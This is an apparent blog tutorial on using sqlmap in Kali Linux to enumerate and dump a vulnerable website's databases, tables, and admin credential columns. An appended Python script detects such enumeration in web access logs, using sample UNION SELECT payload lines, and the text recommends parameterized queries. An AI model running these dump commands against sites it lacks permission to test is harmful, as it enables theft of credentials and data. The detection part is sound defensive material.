Kali Linux Tutorial - Automated SQLi with SQLMAP

How to Hack a Website Using SQLMAP?

Hello! This is Vinit with an interesting tutorial on SQLMAP. SQLMAP is an automated SQL injection and takeover tool used to exploit websites with an SQL injection vulnerability. SQLMAP is included by default in BackTrack 5 and Kali Linux. It exploits the injection vulnerability in a website and shows the attacker details and critical information about the website. Hackers look for the admin username and password through SQL injection.
So let's start.
What we need:
1. BackTrack or Kali Linux with SQLMAP preinstalled
2. A website vulnerable to SQL injection
First, locate SQLMAP on the hard disk.

Then type:

    sqlmap -u "target website url here" --dbs

Note: "-u" is for the target URL and "--dbs" lists the databases.


Here we got two databases, as shown in the figure above.

Now type:

    python sqlmap.py -u "target website url here" -D "database to extract" --tables

Note: here "-D" is for the selected database and "--tables" is for the tables to extract.

Here we got the tables from the database we searched.

Now type:

    sqlmap -u "target url" -D "selected Database" -T "selected-Table" --columns

Note: "-T" is for the selected table, which is admin, and "--columns" is for the columns to extract.

Now type:

    sqlmap -u "target url" -D "selected Database" -T "selected Table" -C "selected Column" --dump

Note: here "-C" is for the selected column and "--dump" is for dumping all data in that column.

Result of python sqlmap.py -u "target url" -D "selected Database" -T "selected Table" -C user --dump

Result of sqlmap -u "target url" -D "selected Database" -T "selected Table" -C password --dump
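
Seen from the server side, the enumeration steps above leave recognizable traces in the web access log. The script below is an added example, not part of the original tutorial, that flags them per client IP. It assumes a MySQL back end, payloads visible in GET query strings, and sqlmap's default "sqlmap/..." User-Agent; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format); not taken from the tutorial.
SAMPLE_LOG = """\
198.51.100.4 - - [12/Mar/2024:10:00:58 +0000] "GET /item.php?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [12/Mar/2024:10:01:02 +0000] "GET /item.php?id=5 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [12/Mar/2024:10:01:09 +0000] "GET /item.php?id=5%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 734 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [12/Mar/2024:10:02:30 +0000] "GET /item.php?id=5%20UNION%20SELECT%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES HTTP/1.1" 200 801 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.0.2.44 - - [12/Mar/2024:11:15:00 +0000] "GET /item.php?id=5+UNION+SELECT+column_name+FROM+information_schema.columns HTTP/1.1" 200 640 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# Client IP, request path and User-Agent from one combined-format log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumption: MySQL metadata tables that each enumeration step has to read.
STAGES = [
    ("--dbs", re.compile(r"information_schema\.schemata", re.I)),
    ("--tables", re.compile(r"information_schema\.tables", re.I)),
    ("--columns", re.compile(r"information_schema\.columns", re.I)),
]

def analyze(log_text):
    """Return {client_ip: sorted list of findings} for suspicious requests."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; ignore it
        hits = set()
        if m["ua"].lower().startswith("sqlmap/"):
            hits.add("sqlmap user-agent")
        query = unquote_plus(m["path"])  # decode %20 and + before matching
        for flag, pattern in STAGES:
            if pattern.search(query):
                hits.add(f"enumeration like {flag}")
        if hits:
            findings.setdefault(m["ip"], set()).update(hits)
    return {ip: sorted(h) for ip, h in findings.items()}

if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        print(ip, hits)
```

The User-Agent check only catches an unmodified client, which is why the query-string check runs independently of it. The underlying fix remains parameterized queries in the application.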

Thanks :)

